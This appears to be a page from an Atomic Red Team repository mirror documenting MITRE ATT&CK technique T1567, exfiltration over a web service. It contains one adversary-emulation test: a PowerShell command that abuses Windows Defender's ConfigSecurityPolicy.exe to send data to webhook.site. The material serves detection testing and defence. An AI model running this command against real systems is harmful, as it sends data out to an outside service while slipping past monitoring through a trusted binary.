security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
AutoSUID_linux
atomic-red-team/atomics/T1567/T1567.md
T
CircleCI Atomic Red Team doc generator 776224b7d3 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-10-25 20:55:47 +00:00

1.3 KiB
Raw Permalink Blame History

T1567 - Exfiltration Over Web Service

Description from ATT&CK

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Atomic Tests


Atomic Test #1 - Data Exfiltration with ConfigSecurityPolicy

Exfiltration of data using ConfigSecurityPolicy.exe https://debugactiveprocess.medium.com/data-exfiltration-with-lolbins-4d9c6e43dacf

Supported Platforms: Windows

auto_generated_guid: 5568a8f4-a8b1-4c40-9399-4969b642f122

Attack Commands: Run with powershell!

$path = resolve-path "c:\ProgramData\Microsoft\Windows Defender\Platform\*\ConfigSecurityPolicy.exe"
& $path[0] c:\temp\config.xml "https://webhook.site?d=sensitive-data-here"

Reference in New Issue View Git Blame Copy Permalink